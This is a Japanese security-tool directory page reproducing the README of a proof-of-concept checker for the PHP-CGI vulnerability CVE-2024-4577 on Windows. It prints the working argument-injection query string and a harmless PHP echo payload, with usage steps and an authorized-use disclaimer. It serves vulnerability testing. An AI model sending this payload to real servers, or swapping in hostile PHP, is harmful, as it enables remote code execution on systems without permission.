Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2024-4577 | Kitploit
ツール/GitHubGitHub/kimjuhyeong95/cve-2024-4577
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubkimjuhyeong95/cve-2024-4577

cve-2024-4577

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-4577 脆弱性テストスクリプト

このPythonスクリプトは、PHPの最新の脆弱性であるCVE-2024-4577を診断するためのシンプルなPoC(Proof of Concept)ツールです。

⚠️ 本ツールはセキュリティ診断目的で提供されており、自分が所有するシステムまたは事前に許可を得た対象にのみ使用してください。


📌 概要

この脆弱性は、PHPがWindows環境でCGIモードで動作する際に、マルチバイト文字のバイパスを利用して任意のPHP設定を注入し、コード実行を誘発できる問題です。

このスクリプトは、対象URLに対してクエリ文字列ベースのバイパスペイロードとPHPコードをPOSTリクエストで送信し、脆弱性の有無を判定します。


✅ 使用方法

1. Pythonのインストール確認

root@kitploit:~
python3 --version

2. 依存パッケージのインストール

root@kitploit:~
pip install requests

3. スクリプトの実行

root@kitploit:~
python3 cve_2024_4577_test.py

4. 対象URLの入力

入力例:

root@kitploit:~
http://192.168.0.10/index.php

またはルートパスのみを入力しても自動処理されます

root@kitploit:~
http://192.168.0.10

🔍 結果の説明

  • ✅ [✅] 脆弱: サーバーがPHPコードを実行しました。
    → このサーバーは脆弱です。

  • ✔️ [✔️] 非脆弱またはブロック済み
    → 応答は受け取ったが、脆弱性は発生しない。

  • ❌ [❌] リクエスト失敗: ...
    → 接続エラー、タイムアウトなどによりテスト失敗。


💡 動作原理

  • 脆弱性バイパス文字列の挿入:

    root@kitploit:~
    ?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
    
  • POST本文にPHPコードを挿入:

    root@kitploit:~
    <?php echo 'CVE-2024-4577-TEST'; ?>
    
  • サーバーがこのコードを実行すると、応答にその文字列が含まれるため判定可能。


⚠️ 免責事項

このスクリプトは教育およびセキュリティ研究目的でのみ提供されており、許可のないシステムをスキャンまたはテストすることは違法です。ユーザーはすべての責任を自己負担します。


📂 ファイル構成

ファイル名説明
cve_2024_4577_test.py脆弱性テスト用Pythonスクリプト
README.md使用方法および説明ドキュメント(本ファイル)
LICENSE.txt

📫 お問い合わせ

バグ報告や提案事項は、メールまたはPRでお寄せください。

📝 License

This project is licensed under the MIT License - see the LICENSE file for details. Copyright (c) 2025 KimJuhyeong95

ツールをダウンロード